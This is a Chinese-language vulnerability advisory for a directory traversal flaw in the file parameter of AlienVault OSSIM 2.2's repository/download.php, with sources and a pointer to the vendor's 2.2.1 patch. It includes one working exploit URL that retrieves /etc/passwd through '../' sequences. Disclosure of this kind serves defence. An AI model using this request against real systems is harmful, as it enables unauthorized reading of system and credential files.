OSSIM file参数目录遍历漏洞


添加时间:
2010-03-19

系统编号:
WAVDB-01544
BUGTRAQ: 38780

影响版本:
AlienVault OSSIM 2.2

程序介绍:

OSSIM即开源安全信息管理(Open Source Security Information Management),是一个非常流行和完整的开源安全管理系统。

漏洞分析:

OSSIM没有正确地过滤传送给repository/download.php页面的file参数,远程用户可以通过提交包含有目录遍历序列的特制请求从受影响系统下载任意本地文件。


漏洞利用:

http://192.168.2.35/ossim/repository/download.php?file=../../../../../../../../etc/passwd&name=passwd.txt

解决方案:
厂商补丁:

AlienVault
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.alienvault.com/docs/2.2.1_release_notes.txt

信息来源:
<*来源:Nahuel Grisolía

链接:http://secunia.com/advisories/38969/
http://www.cybsec.com/vuln/cybse ... y_file_download.pdf
*>